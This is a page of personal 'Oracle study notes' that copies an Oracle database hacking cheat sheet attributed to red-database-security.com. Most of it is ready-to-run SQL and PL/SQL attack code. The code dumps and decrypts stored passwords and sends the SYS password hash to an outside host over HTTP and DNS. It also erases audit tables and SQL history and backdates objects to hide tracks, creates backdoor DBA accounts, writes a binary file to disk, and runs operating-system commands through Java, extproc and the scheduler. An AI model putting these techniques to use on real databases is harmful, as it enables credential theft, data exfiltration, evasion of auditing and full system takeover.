Oracle學習筆記

Information Retrieval:
Get Version:

select * from v$version 
-- all users

Get Security Patchlevel:

select * from dba_registry; 
-- only DBA, 9i+, empty or non existing table= no Security Patch

Installed Database Components:

select * from dba_registry; 
-- only DBA

Get Userlist:

select * from all_users; 
-- only DBA

Get User & Passwords Hashes:

select username,password,account_status from dba_users; 
-- only DBA until 10g R2

Get Apex Password Hashes:

select user_name, web_password_raw from flows_030000.wwv_flow_fnd_user; 
-- only DBA, 030000 = APEX version 3.0, 020100=2.1

Decrypt Apex Password Hashes:

select user_name, 
utl_http.request('http://md5.rednoize.com/?q='||web_password_raw||’&b=MD5-Search’) 
-- only DBA, requires internet access from the database
from flows_030000.wwv_flow_fnd_user;

Get Metalink account/password:

select sysman.decrypt(aru_username), sysman.decrypt(aru_password) 
-- only DBA, 10g – 11g

Get Password of mgmt_view_user

select view_username, sysman.decrypt(view_password) 
from sysman.mgmt_view_user_credentials; 
-- only DBA, 10g – 11g

Get Passwords of DB/Grid Control:

select credential_set_column, sysman.decrypt(credential_value) 
from sysman.mgmt_credentials2; 
-- only DBA, 10g – 11g

TDE Encrypted Tables:

select table_name,column_name,encryption_alg,salt 
from dba_encrypted_columns; 
-- only DBA, 10g – 11g

Already DBA?

desc dba_users 
-- only possible if DBA (or select any dictionary)

Get System Privileges:

select * from user_sys_privs; 
-- show system privileges of the current user

Get Role Privileges:

select * from user_role_privs; 
-- show role privileges of the current user

Get Table Privileges:

select * from user_tab_privs; 
-- show table privileges of the current user

Get interesting tables:

select table_name, column_name, owner
  from dba_tab_columns
 where ((upper(column_name) -- show tables with columns containing the string 'PWD’, ...
         like '%PWD%' or upper(column_name) like '%PASSW%' or
         upper(column_name) like '%CREDEN%' or
         upper(column_name) like '%AUTH%'))

Get a list of all Oracle directories:

select * from dba_directories; 
-- show Oracle directories

Show Values of audit parameter:

show parameter audit 
-- show all parameters of audit

Show Values of utl parameter:

show parameter utl 
-- show all parameters of utl (e.g. *)

Access SQL History (v$sql):

select sql_text
  from sys.v$sql
 where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http

Access SQL History (wrh$_sqltext):

select sql_text
  from sys.wrh$_sqltext
 where lower(sql_text) like '%utl_http%';
-- search all SQL statements containing the string utl_http

 

Web Access:
Web access via utl_http:

select utl_http.request('http://www.orasploit.com/utl_http') from dual;
-- all users,, 8-10g R2

Web access via httpuritype:

select httpuritype( 'http://www.orasploit.com/httpuritype' ).getclob() from dual; 
-- all users,, 8-10g R2

Send password hash to webserver:

select utl_http.request('http://www.orasploit.com/' ||
                        (select username || '=' || password
                           from dba_users
                         -- only DBA, change value of username for other users
                          where username = 'SYS'))
  from dual;

Send password hash to webserver:

select httpuritype('http://www.orasploit.com/' ||
                   (select username || '=' || password
                      from dba_users
                    -- only DBA, change value of username for other users
                     where username = 'SYS')) .getclob()
  from dual;

Send password hash via DNS:

select utl_http.request('http://www.' ||
                        (select username || '=' || password
                           from dba_users
                         -- only DBA, change value of username for other users
                          where username = 'SYS') || '.orasploit.com/')
  from dual;

 

Change Oracle Passwords:

With SQL*Plus Password cmd:

password system; 
-- Password not send in cleartext

With Alter user cmd:

alter user system identified by rds2007; 
-- Password send in cleartext over the network

With Alter user cmd:

alter user system identified by values '737B466C2DF536B9’; 
-- Set a password hash directly

With grant:

grant connect to system identified by rds2007; 
-- Password send in cleartext over the network

With update:

update sys.user$ set password = '737B466C2DF536B9' where name=’SYSTEM’; 
-- Password send in cleartext over the network, DB restart necessary

 

Useful Tools / Links:
checkpwd: http://www.red-database-security.com/software/checkpwd.html -- fastest Oracle dictionary password cracker
orabf http://www.toolcrypt.org/tools/orabf/index.html -- fastest Oracle Brute Force cracker
Tnscmd http://www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd -- control unprotected TNS Listener without Oracle Client
sidguess: http://www.red-database-security.com/software/sidguess.zip -- fastest Oracle dictionary password cracker
Oracle Assessment Kit: http://www.databasesecurity.com/dbsec/OAK.zip -- useful tools, e.g. To exploit the alter session bug
Oracle Instant Client http://www.oracle.com/technology/software/tech/oci/instantclient/index.html -- Oracle Instant Client
Oracle SQL Developer http://www.oracle.com/technology/software/products/sql/index.html -- GUI Tool for Oracle in Java

Anti-Forensics:
Clear v$sql:

alter system flush shared pool; 
-- only DBA, all versions

Clear sys.wrh_sqlstat:

truncate table sys.wrh$_sqlstat; 
-- only DBA, 10g/11g

Clear audit-Table:

truncate table sys.aud$; 
-- only as SYS, all versions

Clear audit-Table:

delete table sys.aud$; 
-- all users, all versions

Change Object Creation Date:

update sys.obj$
   set ctime = sysdate - 300, mtime = sysdate - 300, stime = sysdate - 300
 where name = 'AUD$'; 
-- change the creation date of an object

 

Create Oracle User:

With create user cmd:

create user user1 identified by rds2007; 
grant dba to user1;
-- Password send in cleartext over the network

With grant:

grant dba to user1 identified by rds2007; 
-- Privilege granted, User will be created if not existing

With grant:

grant connect to user1,user2,user3,user4 identified by user1,user2,user3,user4; 
-- Password send in cleartext over the network

 
Run OS Commands via dbms_scheduler: (10g/11g only)

-- Create a Program for dbms_scheduler
exec DBMS_SCHEDULER.create_program('RDS2007','EXECUTABLE','c:\WINDOWS\system32\cmd.exe /c echo 0wned >> c:\rds3.txt',0,TRUE);
-- Create, execute and delete a Job for dbms_scheduler
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2007JOB',program_name => 'RDS2007',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE);
-- delete the program
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2007');
-- Purge the logfile for dbms_scheduler
--exec DBMS_SCHEDULER.PURGE_LOG;

 

Hacking Oracle         –             www.red-database-security.com               - Version 1.3 - 2-Sep-2007

Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767);
BEGIN
bu:=hextoraw('BF3B01BB8100021E8000B88200882780FB81750288D850E8060083
C402CD20C35589E5B80100508D451A50B80F00508D5D00FFD383C40689EC5DC
3558BEC8B5E088B4E048B5606B80040CD21730231C08BE55DC39048656C6C6F
2C20576F726C64210D0A');
fi:=UTL_FILE.fopen('EXT','rds2007.com','w',32767);
UTL_FILE.put_raw(fi,bu,TRUE);
UTL_FILE.fclose(fi);
END;
/

Write Text Files via dbms_advisor: (10g/11g, requires the privilege advisor)

Create or replace directory EXT as 'C:\’;
grant advisor to user1;
exec dbms_advisor.create_file ( 'hacked', EXT, 'rds2.txt' )
Write Binary Files via utl_file:
Create or replace directory EXT as 'C:\’;
DECLARE
   v_file UTL_FILE.FILE_TYPE;
BEGIN 
v_file := UTL_FILE.FOPEN('C:\','rds1.txt', 'w');
   UTL_FILE.PUT_LINE(v_file,'first row');
   UTL_FILE.NEW_LINE (v_file);
   UTL_FILE.PUT_LINE(v_file,'second row');
   UTL_FILE.FCLOSE(v_file);
END;

Read Files via Java:

grant javasyspriv to user1;
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVAREADFILE" AS
import java.lang.*;
import java.io.*;
public class JAVAREADFILE{
public static void readfile(String filename) throws IOException{
FileReader f = new FileReader(filename);
BufferedReader fr = new BufferedReader(f);
String text = fr.readLine();;
while(text != null){
System.out.println(text);
text = fr.readLine(); }
fr.close();        }
};
CREATE OR REPLACE PROCEDURE JAVAREADFILEPROC (p_filename IN
VARCHAR2)
AS LANGUAGE JAVA
NAME 'JAVAREADFILE.readfile (java.lang.String)';
/
set serveroutput on size 100000
exec dbms_java.set_output(2000);
exec JAVAREADFILEPROC('C:\boot.ini')

Run OS Commands via Java: (requires Java in the Database)

grant javasyspriv to user1;
create or replace and resolce java source name "JAVACMD" AS
import java.lang.*;
import java.io.*;
public class JAVACMD
{
public static void execCommand (String command) throws IOException {
     Runtime.getRuntime().exec(command);} };
/
Create or replace procedure javacmdproc (p_command in varchar2)
as language java
name 'JAVACMD.execCommand (java.lang.String)';
/
exec javacmdproc('cmd.exe /c echo 0wned > c:\rds4.txt');

Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)

alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds6.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/

Run OS Commands via Extproc

-- Since 9i extproc can only run DLLs from the Oracle_Home-Bin directory
-- copy the msvcrt.dll to this directory before executing this code
Grant create any library to user1;
--Windows
Create or replace library exec_shell AS 'C:\oracle\ora102\bin\msvcrt.dll';
--Linux
create or replace library systemcalls is '/lib/libc.so';
Create or replace package oracmd is procedure exec(cmdstring IN CHAR); end oracmd; /
Create or replace package body oracmd IS
procedure exec(cmdstring IN CHAR)
is external   NAME "system"
library exec_shell   LANGUAGE C;
end oracmd;
/
exec oracmd.exec('cmd.exe /c echo 0wned > c:\rds7.txt');

Run OS Commands via ALTER SYSTEM & PL/SQL native: (9i)

alter system set plsql_native_make_utility='cmd.exe /c echo 0wned > c:\rds5.txt &';
alter session set plsql_compiler_flags='NATIVE';
Create or replace procedure rds as begin null; end;
/